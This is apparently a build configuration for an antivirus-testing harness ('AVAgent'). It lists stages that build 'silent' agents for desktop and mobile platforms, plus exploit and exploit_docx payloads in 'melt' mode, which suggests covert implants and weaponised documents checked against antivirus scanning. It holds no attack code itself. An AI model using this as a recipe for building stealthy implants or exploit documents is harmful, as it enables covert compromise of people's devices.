

# -------------- BUILD -------------- #
# Requires: START_AGENT

BUILD_ELITE:
    #- CALL: SET_DEFAULTS
    - BUILD: [ pull, windows_elite, silent ]

BUILD_WINDOWS:
    #- CALL: SET_DEFAULTS
    - PUSH: [ AVAgent/assets/avtest.swf, AVAgent/assets/mac* ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    - CHECK_STATIC: [ assets/* ]
    - BUILD: [ pull, windows, silent ]

BUILD_DESKTOP:
    #- CALL: SET_DEFAULTS
    - PUSH: [ AVAgent/assets/avtest.swf ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    - CHECK_STATIC: [ assets/* ]
    - ON_ERROR: CONTINUE
    - BUILD: [ pull, windows, silent ]
    - BUILD: [ pull, osx, silent ]
    - BUILD: [ pull, linux, silent ]
    - ON_ERROR: SKIP

BUILD_MOBILE:
    #- CALL: SET_DEFAULTS
    - ON_ERROR: CONTINUE
    - BUILD: [ pull, blackberry, silent ]
    - BUILD: [ pull, android, silent ]
    - BUILD: [ pull, ios, silent ]
    - BUILD: [ pull, winphone, silent ]
    - ON_ERROR: SKIP

BUILD_EXPLOIT:
    - PUSH: [ AVAgent/assets/avtest.swf, AVAgent/assets/melt*, AVAgent/assets/PMIEFuck-WinWord.dll ]
    - PUSH: [ AVAgent/assets/sqlite, AVAgent/assets/sqlite_mod, AVAgent/assets/codec, AVAgent/assets/codec_mod ]
    #- CALL: SET_DEFAULTS
    #- CALL: SET_BUILD_PARAMS_EXPLOIT
    #- BUILD: [ pull, exploit_web, melt ]
    #- BUILD: [ pull, exploit_ppsx, melt ]
    - BUILD: [ pull, exploit, melt ]
    - BUILD: [ pull, exploit_docx, melt ]